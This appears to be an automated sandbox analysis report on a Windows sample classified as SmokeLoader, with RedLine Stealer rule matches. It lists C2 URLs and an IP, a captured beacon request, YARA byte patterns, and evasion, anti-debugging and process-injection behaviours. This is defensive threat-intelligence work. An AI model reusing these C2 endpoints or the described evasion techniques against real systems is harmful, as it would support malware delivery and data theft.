Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	800803
MD5:	04a988e37b8ea5facd28a7d42764f597
SHA1:	1182f9d0de33e9363c7777f3f76d26c179a856e6
SHA256:	7b734abb20157ca48892547a61f80013138e9659b0942895991a9ab49fdadf79
Tags:	exe
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Machine Learning detection for sample

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Deletes itself after installation

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Uses 32bit PE files

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found evaded block containing many API calls

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 5856 cmdline: C:\Users\user\Desktop\file.exe MD5: 04A988E37B8EA5FACD28A7D42764F597)

file.exe (PID: 1720 cmdline: C:\Users\user\Desktop\file.exe MD5: 04A988E37B8EA5FACD28A7D42764F597)

explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

vhefigi (PID: 4520 cmdline: C:\Users\user\AppData\Roaming\vhefigi MD5: 04A988E37B8EA5FACD28A7D42764F597)

vhefigi (PID: 4556 cmdline: C:\Users\user\AppData\Roaming\vhefigi MD5: 04A988E37B8EA5FACD28A7D42764F597)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x60a4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.270582685.00000000005B6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x624c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.5815a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
11.2.vhefigi.7d15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.vhefigi.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
1.2.file.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 46%
Source: file.exe	Virustotal: Detection: 35%			Perma Link

Antivirus detection for URL or domain

Source: http://host-host-file8.com/

URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: host-file-host6.com	Virustotal: Detection: 17%			Perma Link
Source: host-host-file8.com	Virustotal: Detection: 17%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\vhefigi	ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Roaming\vhefigi	Virustotal: Detection: 35%			Perma Link

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\vhefigi

Joe Sandbox ML: detected

Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: C:\bonibewejed-jubezilopezibi\bun.pdb source: file.exe, vhefigi.2.dr
Source:	Binary string: C:\bonibewejed-jubezilopezibi\bun.pdbx source: file.exe, vhefigi.2.dr

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe	Network Connect: 185.246.221.63 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: host-host-file8.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://host-file-host6.com/
Source: Malware configuration extractor	URLs: http://host-host-file8.com/

Source: Joe Sandbox View

ASN Name: LVLT-10753US LVLT-10753US

Source: Joe Sandbox View

IP Address: 185.246.221.63 185.246.221.63

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uclahet.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-file-host6.com

Source: unknown

DNS traffic detected: queries for: host-file-host6.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.file.exe.5815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vhefigi.7d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.vhefigi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: vhefigi, 0000000B.00000002.387737312.00000000008BA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.270582685.00000000005B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.270582685.00000000005B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041546C	0_2_0041546C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B413	0_2_0040B413
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411D60	0_2_00411D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00413E31	0_2_00413E31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412EE0	0_2_00412EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004122A4	0_2_004122A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004127E8	0_2_004127E8

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 0040B9DC appears 35 times

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040180C Sleep,NtTerminateProcess,	1_2_0040180C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401818 Sleep,NtTerminateProcess,	1_2_00401818
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401822 Sleep,NtTerminateProcess,	1_2_00401822
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401826 Sleep,NtTerminateProcess,	1_2_00401826
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401834 Sleep,NtTerminateProcess,	1_2_00401834
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 12_2_0040180C Sleep,NtTerminateProcess,	12_2_0040180C
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 12_2_00401818 Sleep,NtTerminateProcess,	12_2_00401818
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 12_2_00401822 Sleep,NtTerminateProcess,	12_2_00401822
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 12_2_00401826 Sleep,NtTerminateProcess,	12_2_00401826
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 12_2_00401834 Sleep,NtTerminateProcess,	12_2_00401834

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe	ReversingLabs: Detection: 46%
Source: file.exe	Virustotal: Detection: 35%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vhefigi C:\Users\user\AppData\Roaming\vhefigi
Source: C:\Users\user\AppData\Roaming\vhefigi	Process created: C:\Users\user\AppData\Roaming\vhefigi C:\Users\user\AppData\Roaming\vhefigi
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Process created: C:\Users\user\AppData\Roaming\vhefigi C:\Users\user\AppData\Roaming\vhefigi	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DAC2C1E-7C5C-40eb-833B-323E85A1CE84}\InProcServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/2@4/2

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\vhefigi

Code function: 11_2_008CC0D2 CreateToolhelp32Snapshot,Module32First,

11_2_008CC0D2

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\bonibewejed-jubezilopezibi\bun.pdb source: file.exe, vhefigi.2.dr
Source:	Binary string: C:\bonibewejed-jubezilopezibi\bun.pdbx source: file.exe, vhefigi.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vhefigi	Unpacked PE file: 12.2.vhefigi.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BA21 push ecx; ret	0_2_0040BA34
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406EB0 push eax; ret	0_2_00406ECE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004011D0 push ebx; iretd	1_2_00401217
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004011D7 push ebx; iretd	1_2_00401217
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004011EB push ebx; iretd	1_2_00401217
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 11_2_008CCFD0 push ebx; iretd	11_2_008CD010
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 11_2_008CCFE5 push ebx; iretd	11_2_008CD010
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 11_2_008D1E71 pushad ; iretd	11_2_008D1E77
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 12_2_004011D0 push ebx; iretd	12_2_00401217
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 12_2_004011D7 push ebx; iretd	12_2_00401217
Source: C:\Users\user\AppData\Roaming\vhefigi	Code function: 12_2_004011EB push ebx; iretd	12_2_00401217

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004046F6 LoadLibraryA,GetProcAddress,VirtualProtect,

0_2_004046F6

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vhefigi

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vhefigi

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\vhefigi:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 5944	Thread sleep count: 389 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1316	Thread sleep count: 340 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1316	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5924	Thread sleep count: 203 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3588	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1012	Thread sleep count: 487 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1200	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1184	Thread sleep count: 129 > 30	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-8599

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 389	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 487	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 866	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 858	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

graph_0-8677

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: explorer.exe, 00000002.00000000.305414665.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.305414665.0000000007B66000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000002.00000000.288276761.0000000005FAA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.305414665.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.286848877.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.305414665.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000002.00000000.286848877.0000000005F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040689F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040689F

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004046F6 LoadLibraryA,GetProcAddress,VirtualProtect,

0_2_004046F6

Source: C:\Users\user\AppData\Roaming\vhefigi

Code function: 11_2_008CB9AF push dword ptr fs:[00000030h]

11_2_008CB9AF

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040689F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040689F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CAD1 SetUnhandledExceptionFilter,	0_2_0040CAD1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040730B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040730B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041030E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_0041030E

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: vhefigi.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe	Network Connect: 185.246.221.63 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: host-host-file8.com

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
